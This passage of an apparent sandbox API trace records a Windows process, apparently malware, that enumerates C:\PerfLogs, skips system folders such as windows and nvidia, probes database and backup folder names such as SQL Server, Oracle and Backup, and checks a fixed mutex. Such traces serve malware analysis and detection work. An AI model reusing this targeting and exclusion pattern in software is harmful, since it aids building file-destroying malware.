lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 9 [0103.672] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 18 [0103.672] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e744, cchWideChar=2047 | 
out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 28 [0103.672] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=10, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 10 [0103.673] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 8 [0103.673] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 9 [0103.673] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.673] SHGetMalloc (in: ppMalloc=0x18f78c | out: ppMalloc=0x18f78c*=0x767666bc) returned 0x0 [0103.673] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f788 | out: ppidl=0x18f788) returned 0x0 [0103.674] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.675] SysReAllocStringLen (in: pbstr=0x18f810*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f810*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.675] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.675] 
IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.675] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.675] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.675] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.675] GlobalUnlock (hMem=0x45000c) returned 0 [0103.675] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.675] GlobalLock (hMem=0x450004) returned 0x588000 [0103.675] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.675] GlobalUnlock (hMem=0x45000c) returned 0 [0103.675] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.675] GlobalUnlock (hMem=0x450004) returned 0 [0103.675] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577df0 [0103.676] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.676] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, 
ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0103.676] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0103.676] GetLastError () returned 0x12 [0103.676] FindClose (in: hFindFile=0x577df0 | out: hFindFile=0x577df0) returned 1 [0103.676] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.676] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.676] GlobalUnlock (hMem=0x450004) returned 0 [0103.676] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.676] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.676] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.676] GlobalUnlock (hMem=0x450004) returned 0 [0103.676] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.676] GlobalUnlock (hMem=0x45000c) returned 0 [0103.676] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577df0 [0103.676] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f788 | out: 
lpLocalFileTime=0x18f788) returned 1 [0103.677] FileTimeToDosDateTime (in: lpFileTime=0x18f788, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0103.677] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.677] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.677] GlobalUnlock (hMem=0x45000c) returned 0 [0103.677] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.677] GlobalLock (hMem=0x450004) returned 0x588000 [0103.677] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.677] GlobalUnlock (hMem=0x45000c) returned 0 [0103.677] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.677] GlobalUnlock (hMem=0x450004) returned 0 [0103.677] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.677] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.677] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0103.677] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0103.677] GlobalLock (hMem=0x450004) returned 0x570108 [0103.677] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.677] GlobalUnlock (hMem=0x450004) returned 0 [0103.677] GlobalLock (hMem=0x450004) returned 0x570108 [0103.677] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.677] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.677] GlobalUnlock (hMem=0x450004) returned 0 
[0103.677] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.678] GlobalUnlock (hMem=0x45000c) returned 0 [0103.678] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.678] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0103.678] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f784 | out: lpLocalFileTime=0x18f784) returned 1 [0103.678] FileTimeToDosDateTime (in: lpFileTime=0x18f784, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0103.678] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.678] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.678] GlobalUnlock (hMem=0x45000c) returned 0 [0103.678] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.678] GlobalLock (hMem=0x450004) returned 0x588000 [0103.678] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.678] GlobalUnlock (hMem=0x45000c) returned 0 [0103.678] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.678] GlobalUnlock (hMem=0x450004) returned 0 [0103.678] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.678] GlobalLock (hMem=0x450004) returned 0x570108 [0103.678] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.678] GlobalUnlock (hMem=0x450004) returned 0 [0103.678] GlobalLock (hMem=0x450004) returned 0x570108 [0103.678] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.678] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.678] 
GlobalUnlock (hMem=0x450004) returned 0 [0103.678] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.679] GlobalUnlock (hMem=0x45000c) returned 0 [0103.679] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.679] SysReAllocStringLen (in: pbstr=0x18f784*=0x0, psz="C:\\PerfLogs\\Admin", len=0x11 | out: pbstr=0x18f784*="C:\\PerfLogs\\Admin") returned 1 [0103.679] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.679] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.679] GlobalUnlock (hMem=0x45000c) returned 0 [0103.679] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.679] GlobalLock (hMem=0x450004) returned 0x588000 [0103.679] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.679] GlobalUnlock (hMem=0x45000c) returned 0 [0103.679] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.679] GlobalUnlock (hMem=0x450004) returned 0 [0103.679] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Microsoft\\Exchange Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="䱈@纄W繘W企@\x18㵤V\x18\x1b")) returned 0xffffffff [0103.679] GetLastError () returned 0x3 [0103.679] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.679] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=26, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, 
cbMultiByte=21, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\暼癶罀W\x18޾疥罀W") returned 21 [0103.680] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Microsoft SQL Server", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@縴W企@\x18㮴V\x181")) returned 0xffffffff [0103.680] GetLastError () returned 0x2 [0103.680] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=21, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\暼癶罀W\x18޾疥罀W") returned 9 [0103.681] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Firebird", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@紌X企@\x18㥔X\x18;")) returned 0xffffffff [0103.681] GetLastError () returned 0x2 [0103.681] CharLowerBuffW (in: 
lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.681] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99a8, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.681] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\暼癶罀W\x18޾疥罀W") returned 8 [0103.681] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\MSSQL.1", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18D")) returned 0xffffffff [0103.681] GetLastError () returned 0x2 [0103.682] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99a8, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0103.682] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㮴V企@\x18縴W\x18j")) returned 0xffffffff [0103.682] GetLastError () returned 0x2 [0103.682] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0103.682] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0103.683] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Adobe", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㊼W企@\x18㥔X\x18q")) returned 0xffffffff [0103.683] GetLastError () returned 0x2 [0103.714] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.714] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="adobe\\縰WP") returned 6 [0103.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, 
lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0103.857] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Oracle", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18y")) returned 0xffffffff [0103.857] GetLastError () returned 0x2 [0103.857] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0103.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0103.858] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Archive", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㷴V企@\x18㥔X\x18\x81")) returned 0xffffffff [0103.858] GetLastError () returned 0x2 [0103.858] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: 
lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0103.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0103.858] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Backup", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18\x88")) returned 0xffffffff [0103.858] GetLastError () returned 0x2 [0103.859] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.859] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="backup㥐X\x10") returned 6 [0103.859] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0103.859] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Reserv", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, 
ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㷴V企@\x18㥔X\x18\x8f")) returned 0xffffffff [0103.859] GetLastError () returned 0x2 [0103.859] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.859] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="reserv㥸X\x10") returned 6 [0103.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e44c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0103.860] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\Restore", lpFindFileData=0x18f200 | out: lpFindFileData=0x18f200*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώ֍", cAlternateFileName="긴V䱠@㵤V企@\x18㥼X\x18\x97")) returned 0xffffffff [0103.860] GetLastError () returned 0x2 [0103.860] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0103.860] GlobalLock (hMem=0x450004) returned 0x570108 [0103.860] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.860] GlobalUnlock (hMem=0x450004) returned 0 [0103.861] GlobalLock (hMem=0x450004) returned 0x570108 [0103.861] GlobalLock (hMem=0x45000c) 
